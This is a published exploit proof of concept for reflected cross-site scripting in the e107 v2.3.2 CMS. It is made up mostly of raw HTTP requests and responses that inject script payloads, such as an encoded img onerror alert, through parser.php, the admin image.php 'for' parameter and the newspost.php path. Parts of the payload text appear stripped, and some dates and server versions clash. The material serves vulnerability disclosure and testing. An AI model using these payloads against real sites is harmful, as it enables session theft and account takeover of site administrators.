# Exploit Title: e107 v2.3.2 - Reflected XSS # Date: 11/05/2022 # Exploit Author: Hubert Wojciechowski # Contact Author: hub.woj12345@gmail.com # Vendor Homepage: https://e107.org/ # Software Link: https://e107.org/download # Version: 2.3.2 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### XSS Reflected - unauthorized URL: http://127.0.0.1/e107/e107_plugins/tinymce4/plugins/e107/parser.php Parameters: content # POC Request: POST /e107/e107_plugins/tinymce4/plugins/e107/parser.php HTTP/1.1 Host: 127.0.0.1 Content-Length: 1126 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" Accept: text/html, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://127.0.0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3 Accept-Encoding: gzip, deflate Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close content=%5Bhtml%5D%3Cp%3E%3Cstrong%3ELore"/>bb&mode=tohtml Response: HTTP/1.1 200 OK Date: Thu, 11 May 2023 19:38:45 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Set-Cookie: PHPSESSID=c4mphnf1igb7lbibn4q1eni10h; expires=Fri, 12-May-2023 19:38:45 GMT; Max-Age=86400; path=/e107/; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 1053 Connection: close Content-Type: text/html; charset=UTF-8

Lore"/>bb ### XSS Reflected - Authorized URL: http://127.0.0.1/e107/e107_admin/image.php Parameters: for # POC 1 Request: GET /e107/e107_admin/image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1 HTTP/1.1 Host: 127.0.0.1 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Connection: close Response: HTTP/1.1 200 OK Date: Thu, 04 May 2023 03:07:35 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "37f107dbe6a998ecf7b71689627c2a56" Content-Length: 12420 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8 Media Manager - Admin Area :: hacked">bbbbb [...]

dezaw&path=">

No HTML5 support.

[...] # POC 2 URL: http://127.0.0.1/e107/e107_admin/newspost.php Parameters: Payload in URL Request: GET /e107/e107_admin/newspost.php/sdd4h">kzb89?mode=main&action=list HTTP/1.1 Host: 127.0.0.1 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3 Accept-Encoding: gzip, deflate Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=ftq2gnr1kgjqhfa3u902thraa8 Connection: close Response: HTTP/1.1 200 OK Date: Fri, 05 May 2023 06:21:53 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "d127dd6a44a22e093fed60b83bf36af2" Content-Length: 72914 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8 News - List - Admin Area :: hacked">bbbbb [...] [...]